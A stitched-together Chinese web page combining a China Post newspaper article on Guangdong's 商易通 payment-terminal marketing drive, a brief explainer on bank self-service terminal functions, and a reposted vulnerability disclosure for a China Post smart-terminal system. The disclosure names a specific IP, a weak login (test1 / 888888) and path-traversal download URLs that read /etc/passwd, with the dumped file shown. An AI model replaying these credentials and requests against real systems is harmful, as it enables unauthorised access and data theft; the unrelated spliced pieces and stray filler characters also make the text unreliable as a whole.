中国邮政报
◆商易通?邮政金融服务商贸
营销推手 广东邮银合力造
本报通讯员 张胜春 宋丽燕
商易通终端成为商贸客户接触邮政储蓄的第一步。
　　“商易通，冲！冲！冲！业绩一定要成功！”广东省广州市邮政局营销沙龙商易通的标识牌下，来自全市的商易通攻坚队员的集体宣誓气势如虹；东莞某商贸市场内，出现了一支着装整齐的邮政商易通攻坚队，在忙碌地为集团客户统一装机；在湛江某大型商贸市场内，商易通巡回路演吸引了很多人驻足观看。
　　为贯彻集团公司商贸市场战略，广东各级邮政和银行部门通力合作，根据集团公司金融信息化领导小组的总体安排，在省公司的统一部署下，精心组织、周密策划，将商易通业务与华商联盟服务实现有机结合，不仅使业务取得初步成效，而且使邮政金融在商贸市场服务领域的优势大大提升。截至8月31日，全省发展商易通客户27042户，客户沉淀资金超过36亿元。广东开展商易通攻坚战以来，业务呈现加速发展态势，仅6、7、8三个月，就发展商易通20848户，是广东各家商业银行同类产品“路路通”业务同期发展总和的5倍多。
　　短兵相接　商贸市场烽烟四起　　为贯彻集团公司商贸市场服务战略，广东在去年推出了华商联盟个体工商户专项服务品牌。但随之而来，个体工商户结算领域引起了各家银行的高度重视，从广东银联的路路通、农业银行的固定电话支付业务到其他商业银行的自助终端，使得邮政储蓄在个体工商户领域面临各家商业银行的全面围攻。
　　2008年，广东银联推出了针对个体工商户的专项结算品牌――路路通，全力抢占商贸市场支付市场，仅两个月时间，路路通在广州、东莞等5地就发展用户6950户，并于5月初开始在全省范围内推广，成为商易通业务的最大威胁。
　　其他商业银行也不甘寂寞，试图在商贸市场分一杯羹。商业银行各出奇招，目光不约而同地在商贸市场上聚集，一时间，广东商贸市场上硝烟弥漫。在这种形势下，广东邮政要想突出重围、寻求发展，必须求新、求变，以深远的发展眼光和精准的市场策略，来抢占发展制高点。
　　高度重视　做好全面攻坚“三环节”　　为使集团公司战略意图得到真正贯彻，迅速抢占市场，省公司与省分行经过反复论证，在2008年年初确定了全年发展6万户商易通客户奋斗目标，并于5月底联合推出了商易通攻坚战活动，为使攻坚战活动取得成效，全省上下从组织、督办、激励三个重点环节给予了全方位重视。
　　环节一：活动组织。为确保攻坚目标完成，提高工作效率，省公司成立了攻坚指挥部，由总经理张宗武任总指挥。各市局也成立了攻坚指挥部，充分利用经营、技术、人力、财务、专业等各种资源，明确攻坚目标、落实营销策划、业务流程、机具安装、激励方案等相关工作的具体责任人。目前，在省―市―县（区）―支局4个层面成立了各层级联动的攻坚指挥和执行机构，邮银双方共同参与。这种组织架构基本保证了指挥到位、管理到位、人员到位、宣传到位、支撑到位，有效确保了业务发展中人、财、物等问题得到快速解决，为攻坚目标的完成提供了基本保障。
　　环节二：推动督办。为确保攻坚战目标的完成，省公司、省分行领导一直要求从战略高度认识商易通业务，将商易通发展作为邮储银行建设自助终端网络，提升企业效能的重点项目，各市邮政局、分行要将商易通作为一把手工程来抓。张宗武在攻坚战上亲自动员，强调商易通业务是战略业务、巩固邮政优势的业务、高效业务以及与时间赛跑的业务，同时强调商易通攻坚战是银行成立之后的第一场邮银合作战略，是检验各地邮银合作的试金石，明确要求各市一把手要亲自过问，每月必须到基层网点调研一次商易通的发展情况，现场解决问题，每半月必须召开一次专题会议。省分行行长邵智宝将商易通业务确定为今年银行的三项重点业务之一，在深入分析当前经济形势的基础上，提出商易通业务的发展策略。同时，为创造发展条件，还通过召开总结分析会、出台周报、每天发送进度短信，使全省形成你追我赶的氛围，业务发展进度得到有效控制。
　　环节三：激励设计。为有效确保攻坚战目标的实现，省公司将商易通攻坚战列为今年重点营销项目之一，拿出260万元的奖励资金进行重点激励，同时，在财务政策上向该项目倾斜。
　　瞄准目标　把好集团营销“三道关”　　为提升商易通的竞争力，快速抢占市场，迅速形成规模，广东省公司和省分行在调查论证的基础上，在第三季度推出了集团客户营销方案。通过将商贸客户以市场为单位，集合成集团客户，给予相应的准入优惠，在短时间内对全省商贸市场展开全省性集中、统一的营销，发展一批优质的商贸客户群，迅速扩大商易通在商贸市场中的影响力。为做好集团客户推广，他们从发展计划、客户质量、市场营销三个方面严格把关，有效推动了集团客户的增长，截止到8月31日，全省在普遍走访的基础上，两个月成功发展集团客户158个，发展商易通用户11014户，使集团客户营销活动成为全省商易通增长的重要力量。
　　周密部署，严把计划关。为使集团客户营销真正取得成效，省公司要求各市攻坚指挥部要在对本地商贸市场全面调研的基础上，通过明确每个商贸市场的具体攻坚队和攻坚责任人，确保活动取得实效。他们根据商贸市场开发周期，将一个商贸市场开发分为计划制定、确定目标、客户发展、客户评价4个阶段对活动进行严格控制。在计划制定阶段，要求各地对本地商贸市场进行全面调研，取得市场性质、商家数量、电子终端数量等基本资料，并对每个市场发展可能性进行简要评述；在确定目标阶段，要求各局在调研基础上明确各自发展目标，每个局至少确定3个市场目标，在周报上向全省公布各地发展目标市场；客户发展阶段，要求每个局每月至少举办一次推介会，发展一户集团客户；在客户评估阶段，将对各地集团客户展开评估，并定期公布。通过各阶段的措施，使集团客户发展基本能按计划和要求稳步推进，确保了工作成效。
　　认真审核，严把质量关。在集团客户营销中，为方便基层营销工作的开展，省公司给予了集团客户相应的准入优惠，但并不是无限制地放宽，要求集团客户必须是“同一市场或同一行业，同时至少要求在50户以上，而且集团客户平均每户余额要在5万元以上”。
　　精心策划，严把营销关。为推动集团客户营销工作，推动基层营销工作，方便客户拜访，省分行一方面制作了“标准《商易通》推介PPT”供各局营销参考，同时在中秋节前夕，推出了“牵手商易通，月圆情更浓”客户拜访活动。由省分行进行统一的宣传策划，购买了1.2万盒月饼、30部数码相机以及GPS导航仪作为拜访礼品，为各地营销提供了有力支撑。在这些营销策划的带动下，全省各地营销活动异彩纷呈，展现出良好的互动。广州局还给攻坚队员制作了《商易通营销宝典》、启动了营销沙龙；揭阳局启动了柜台、电话、拜访联合互动；湛江局推出了寻找桃花源活动，这一系列活动使业务迅速扩大了规模。
　　联合互动　唱好联动营销“三部曲”　　为推动商易通业务发展，广东省分行在对华商联盟服务和商易通业务性质进行分析的基础上，根据商易通发展不同阶段，推出了商易通与华商联盟联动营销三部曲，有效实现了商易通与华商联盟的互动。
　　第一步：熟悉业务。广东省分行自2007年推出“华商联盟”服务品牌以来，目前，已拥有会员3.3万名，这是邮储商贸市场客户拓展的基础。为充分利用这部分资源发展业务，他们重点开展了两项工作，一是在商易通推广之前，针对华商联盟客户，通过“DM商函+短信反馈”的形式，对华商联盟客户做了一次快速的市场调查，以了解客户对商易通的反映，寻找商易通业务的市场切入点；二是在全省全面推广之前，在5月份要求各地向现有的华商联盟客户推介商易通，使营销人员初步掌握商易通推销技巧、理顺推广业务流程、熟悉市场基本状况。这项活动从一线反映出大量问题，为全省大规模推广奠定了基础。
　　第二步：联动营销。为进一步拓展商易通业务，广东省分行对华商联盟和商易通业务性质进行了重新梳理和细分，华商联盟重点在于网点柜台服务，商易通重点在于自助服务，但双方都是针对共同的客户群。为拓展商易通业务，他们针对商易通为华商联盟客户带来的便利，从8月开始策划了“华商联盟”升级系列活动，重点推广，凡是成为华商联盟客户，在享受原来柜台优先、优惠、优质服务的同时，不仅能轻松拥有电话终端，而且在资费政策上将享受更加优惠的政策。通过展开全省巡回路演、网点宣传等方式，使华商联盟与商易通实现了良好互动，有效推动了业务的发展。
　　第三步：提高贡献。在集团客户发展中，广东尽管给予了相应的准入优惠，但坚持仅华商联盟客户才能享受相应的资费优惠，集团客户尽管拥有商易通终端，但不享受相应的资费优惠。这种策略一方面使商易通准入门槛降低，商易通终端成为商贸客户接触邮政储蓄的第一步，使商贸市场客户从便利终端入手，对邮政金融服务的认知循序渐进，更易成为忠诚客户；另一方面使商易通业务发展变得更为直接，有利于调动营销员的工作积极性。但带来这些好处的同时，也使商易通客户面临贡献降低的问题。为提高集团客户的贡献，广东省分行在8月底推出了商易通“金牌商家”评比、针对集团客户展开华商联盟宣传、举办专题推介会活动，鼓励集团客户转化为华商联盟客户，有效提高了商易通客户的贡献率。
　　强化内控　夯实业务管理“三基石”　　商易通业务作为一项全新业务，其营销模式、风险环节和操作流程与以往储蓄业务有很大区别，为确保业务平稳起步，广东省分行从制度完善、流程梳理与风险控制三方面入手，加强对业务过程的管理和控制。
　　基石一：规范制度。为确保规范发展和安全运行，针对业务处理关键环节，重点制定了以下三个管理办法：一是制定了广东省商易通电话支付业务管理办法细则及操作规程。在总行管理办法、操作规程基础上，结合广东商易通业务主要针对华商联盟客户群的发展思路，进一步明确各级管理职责和操作规范，使业务发展、业务管理有据可依。二是加强密钥管理。根据总行对商易通电话支付系统密钥管理的要求，成立省分行密钥管理小组，并制定广东省商易通电话支付系统密钥管理办法，明确省分行二级母卡、系统主控卡、操作员卡等各类卡片以及相应密码的管理流程。三是加强集团客户管理。为规范集团客户管理，对集团客户准入流程进行了严格规定，并制定了《集团客户管理办法》，使集团客户管理的各项工作得到有效规范。
　　基石二：互控流程。为确保安全，广东省分行对业务处理不相容职责进行了梳理，重点明确了以下两个关键环节的处理：一是做到商户发展与机具安装分离、商户发展与资料维护分离。在业务处理流程中，确立了营销人员、资料维护人员、设备安装人员分离的管理模式。即客户经理在支行长授权下负责发展及维护商户，县（市）支行负责审批及维护商户资料，县（市）支行成立安装队伍负责终端机具的安装和维护。二是做到密钥与制卡分离、管理与操作分离。在省分行各部室严格分工，个人业务一部负责整体业务的管理、策划和推广工作；会计部制卡中心负责密钥卡等重要空白凭证的实物管理及制卡工作；科技部门负责密钥管理及技术支撑工作。
　　基石三：环节控制。在制度设计上，广东分行重点针对商易通业务的几个关键风险点，分别设计了有针对性的措施，有效确保了业务的运行。一是在押金风险管理上，通过在用户服务协议中增加相关条款，采取对绑定主卡进行限额止付方式收取终端机具押金，有效防范账外现金处理带来的操作风险。二是在商户风险管理上，一方面要求客户必须是各类商贸市场内符合邮政储蓄华商联盟客户条件的个体工商户，以杜绝虚假申请；另一方面通过规定营销人员定期回访制度，有效防范了商户利用机具为他人进行款项结算和洗钱带来的风险。三是在实物风险管理上，制定了实物管理流程，明确了终端机具发放线路及日常登记、上报核准制度，PSAM卡（密钥卡）需严格按照重要空白凭证发放流程操作等细则，有效控制了因机具发放、PSAM卡管理带来的风险。
　　“雄关漫道真如铁，而今迈步从头越”。广东邮政人用自己的激情和热血，积极抢占发展先机，把握市场机遇，为商易通的发展作出了有益的尝试。但这仅仅只是开始，商业银行对商贸市场的合围之势有增无减、邮储商贸市场结算品牌的独树一帜仍待时日，更大的市场有待去发掘、更激烈的竞争将不断上演。相信广东邮政人将会以自己的团结、勇敢、勤劳、智慧，努力开拓，继续创造商易通的发展奇迹，谱写广东邮政业务发展的新篇章。广东分行供图银行的自助终端机可实现哪些功能？
- 希财新金融
投稿请发送邮件至
银行的自助终端机可实现哪些功能？
34743&&&&&&&&&&&&
75pengj&&&&&&
&&&&&&来源：希财网
　　银行自助终端机通常是摆放在银行大厅的机器。我们通常可用来给信用卡还款、查询账户等操作。那么。具体而言，银行的自助终端机可实现哪些功能？
　　银行的自助终端机的功能主要包括：现金取款、现金存款、现金存取款、余额查询、本行或异行转账、修改密码等基本功能；有些多功能自助终端机还提供诸如存折打印、对账单打印、支票存款、信封存款、缴费、充值等一系列便捷服务。
　　中国城市的人口密集，高于外国城市，一些生活必须的金融支付行为&&如水费、电费、煤气费、手机费、交通出行、公交卡充值、转账支付等，要到各种单位去交费，有的是以银行或邮政储蓄作为代缴窗口。但是银行营业时间有限、工作量大授权流程繁琐、缴费人数众多等问题造成市民缴费难，便民自助服务终端的出现既解决了市民缴费的问题。
　　可以实现包括公共事业费缴费、手机充值缴费、电影票购买、福利彩票购买、演出票务购买、火车票购买、优惠券打印、保险购买缴费、银行卡转账、信用卡还款、银行卡余额查询、团购、安欣商城等多种便民支付功能。自助终端机外型美观简洁，全天候的自助服务及简便的触摸操作极大地方便了广大消费者的日常缴费和电子支付业务。
　　注：本文由希财网（）编辑整理，任何个人或机构未经授权不得修改其中内容。如需转载，请注明出处，并带上原文链接，违者将追究法律责任。
【原创声明】凡注明“来源：希财新金融”的文章，系本站原创，任何单位或个人未经本站书面授权不得转载、链接、转贴或以其他方式复制发表。否则，本站将依法追究其法律责任。
您也可以后再评价评论
暂时还没有评论哦，来说两句吧！
风险提示：广告信息均来自平台方，不代表平台安全性，不构成投资建议！红包、体验金、理财金、大礼包、加息券、满减券、优惠券等都不直接等同于现金。参考收益说明不是收益承诺，不代表最终真实收益。理财有风险，投资需谨慎！中国邮政多个严重漏洞打包（邮政智能终端权限泄露）
(window.slotbydup=window.slotbydup || []).push({
id: '2611110',
container: s,
size: '240,200',
display: 'inlay-fix'
您当前位置： &
[ 所属分类
| 时间 2016 |
作者 红领巾 ]
中国邮政多个严重漏洞打包（邮政智能终端权限泄露）
中国邮政集团公司信息技术局
任意文件遍历/下载
厂商已经确认
任意文件读取,任意文件读取利用
web配置下载，里面是web.config 包含了一些短信接口等敏感信息
然后是另外一个主系统
http://211.156.198.57
中国邮政智能终端系统，没有验证码，首先是通过xml检查用户名
然后用户名存在返回工号后再匹配密码
存在弱口令账户
test1 / 888888
登陆进去系统
然后有个操作文档下载那里 抓包
是这样的连接 一看path 就知道多半是任意文件下载了
这里还泄露了web目录 原来是weblogic的程序
http://211.156.198.57/jsp/yzznzd/bbxf/downfile.jsp?filename=//opt//weblogic//Oracle//Middleware//user_projects//domains//yzznzd_domain//app//czsc.zip&paths=//opt//weblogic//Oracle//Middleware//user_projects//domains//yzznzd_domain//app//czsc.zip
http://211.156.198.57/jsp/yzznzd/bbxf/downfile.jsp?filename=/wooyun.txt&paths=/etc/passwd
root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinnews:x:9:13:news:/etc/news:uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinldap:x:55:55:LDAP User:/var/lib/ldap:/bin/falsenscd:x:28:28:NSCD Daemon:/:/sbin/nologinzabbix:x:100:101:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologindistcache:x:94:94:Distcache:/:/sbin/nologinais:x:39:39:openais Standards Based Cluster Framework:/:/sbin/nologin:x:27:27:MySQL Server:/var/lib/mysql:/bin/bashpcap:x:77:77::/var/arpwatch:/sbin/nologincyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bashdbus:x:81:81:System message bus:/:/sbin/nologinapache:x:48:48:Apache:/var/www:/sbin/nologinavahi:x:70:70:Avahi daemon:/:/sbin/nologinrpc:x:32:32:Portmapper RPC user:/:/sbin/nologinamanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bashoprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologinpostfix:x:89:89::/var/spool/postfix:/sbin/nologinmailnull:x:47:47::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinquagga:x:92:92:Quagga routing suite:/var/run/quagga:/sbin/nologinpostgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bashradiusd:x:95:95:radiusd user:/home/radiusd:/sbin/nologinnamed:x:25:25:Named:/var/named:/sbin/nologindbmail:x:101:102:DBMail Daemon Account:/var/lib/dbmail:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinident:x:98:98::/:/sbin/nologinmailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologinhacluster:x:511:90::/home/hacluster:/bin/bashsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinwebalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologinprivoxy:x:73:73::/etc/privoxy:/sbin/nologindovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologinradvd:x:75:75:radvd user:/:/sbin/nologinsquid:x:23:23::/var/spool/squid:/sbin/nologinxfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:::Anonymous NFS User:/var/lib/nfs:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinipos:x:512:512::/home/ipos:/bin/bashoracle:x:513:513::/home/oracle:/bin/bashyzznzd:x:514:512::/home/yzznzd:/bin/bash
漏洞证明：
见详细说明
修复方案：
修复弱口令，限制下载path。
版权声明：转载请注明来源 路人甲@乌云
本文web安全相关术语:黑盒测试方法 黑盒测试和白盒测试 网站安全检测 360网站安全检测 网络安全知识 网络安全技术 网络信息安全 网络安全工程师
转载请注明本文标题：本站链接：
分享请点击：
1.凡CodeSecTeam转载的文章,均出自其它媒体或其他官网介绍,目的在于传递更多的信息,并不代表本站赞同其观点和其真实性负责；
2.转载的文章仅代表原创作者观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,本站对该文以及其中全部或者部分内容、文字的真实性、完整性、及时性，不作出任何保证或承若；
3.如本站转载稿涉及版权等问题,请作者及时联系本站,我们会及时处理。
登录后可拥有收藏文章、关注作者等权限...
CodeSecTeam微信公众号
学习的本质是为了解决问题。学以致用 格物致知。
手机客户端